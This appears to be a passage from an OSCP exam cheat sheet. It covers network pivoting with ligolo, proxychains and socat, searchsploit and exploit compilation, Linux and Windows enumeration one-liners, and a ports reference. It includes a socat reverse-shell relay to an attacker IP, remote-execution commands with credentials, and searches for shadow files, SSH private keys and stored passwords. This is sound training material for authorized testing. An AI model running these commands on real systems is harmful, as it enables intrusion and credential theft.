sudo ip route add 192.168.2.0/24 dev ligolo

# Port forward: expose listener on agent side → attacker port
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
Proxychains
# Config file: /etc/proxychains4.conf
# Add at bottom:
# socks5 127.0.0.1 1080

proxychains nmap -sT -Pn -n 192.168.2.1
proxychains curl http://192.168.2.1
proxychains evil-winrm -i 192.168.2.10 -u admin -p pass
proxychains impacket-psexec domain/user:pass@192.168.2.10
proxychains crackmapexec smb 192.168.2.0/24 -u user -p pass

# Quiet mode (less spam)
proxychains -q nmap ...
Socat
# Port relay (forward port to internal host)
socat TCP-LISTEN:8080,fork TCP:<internal_IP>:80

# Reverse shell relay through pivot
# On pivot:
socat TCP-LISTEN:4444,fork TCP:<attacker_IP>:4444
🛠️ Misc & Searchsploit
Searchsploit
searchsploit apache 2.4.49
searchsploit -t "apache 2.4"              # title only
searchsploit --id apache                  # show EDB IDs
searchsploit -m 40839                     # copy exploit to cwd
searchsploit -x 40839                     # examine without copying
searchsploit -u                           # update database
searchsploit -p 40839                     # show full path
Compiling Exploits
# Linux
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit32          # 32-bit
gcc exploit.c -o exploit -pthread -lcrypt

# Cross-compile for Windows
x86_64-w64-mingw32-gcc exploit.c -o exploit64.exe
i686-w64-mingw32-gcc exploit.c -o exploit32.exe
x86_64-w64-mingw32-gcc -o exploit.exe exploit.c -lws2_32   # with winsock
Useful Linux One-liners
# Find files
find / -name "proof.txt" 2>/dev/null
find / -name "local.txt" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -v proc

# Find setuid files recently modified
find / -perm -4000 -newer /tmp -type f 2>/dev/null

# Check network
ss -tulnp
netstat -antp
ip route
arp -n
cat /etc/hosts
cat /etc/resolv.conf

# Check running processes
ps auxf
ps aux | grep root

# Readable shadow/passwd backup
find / -name "shadow*" -o -name "passwd*" 2>/dev/null

# SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null

# Readable backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | grep -v proc
Useful Windows One-liners
# Find proof files
dir /s /b proof.txt 2>nul
where /r C:\ proof.txt

# Find passwords in files
findstr /si "password" *.txt *.ini *.config *.xml *.ps1

# Active network connections
netstat -ano
netstat -ano | findstr LISTEN

# Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "task\|run\|status"

# Installed 32-bit software
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr DisplayName

# PowerShell history
type C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Check AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
OSCP Exam Checklist
# Collect proof files
cat /root/proof.txt           # Linux root
type C:\Users\Administrator\Desktop\proof.txt   # Windows admin

# Take screenshot showing:
# - proof.txt contents
# - ipconfig / ip a (confirms machine IP)
# - whoami (confirms privilege level)

# Note: You can use Metasploit on ONE machine only
# AD set: 3 machines, worth 40 points total
# Standalone: 3 machines, 60 points total
# Passing score: 70 points
Common Ports Reference
| Port | Service | Notes |
|---|---|---|
| 21 | FTP | Try anonymous login |
| 22 | SSH | Key-based auth, banner grab |
| 23 | Telnet | Cleartext, legacy |
| 25 | SMTP | User enum via VRFY/EXPN |
| 53 | DNS | Zone transfer: dig axfr |
| 79 | Finger | User enum |
| 80/443 | HTTP/HTTPS | Full web enum |
| 110 | POP3 | Email retrieval |
| 111 | RPCBind | rpcinfo -p <IP> |
| 135 | MSRPC | rpcclient, enum4linux |
| 139/445 | SMB | smbclient, enum4linux, CrackMapExec |
| 161/UDP | SNMP | community string brute |
| 389/636 | LDAP/LDAPS | ldapsearch, ldapdomaindump |
| 1433 | MSSQL | impacket-mssqlclient |
| 2049 | NFS | showmount -e |
| 3306 | MySQL | mysql -u root -p |
| 3389 | RDP | xfreerdp, rdesktop |
| 5432 | PostgreSQL | psql -h <IP> -U postgres |
| 5985/5986 | WinRM | evil-winrm |
| 6379 | Redis | redis-cli -h <IP> |
| 8080/8443 | HTTP alt | Check for admin panels |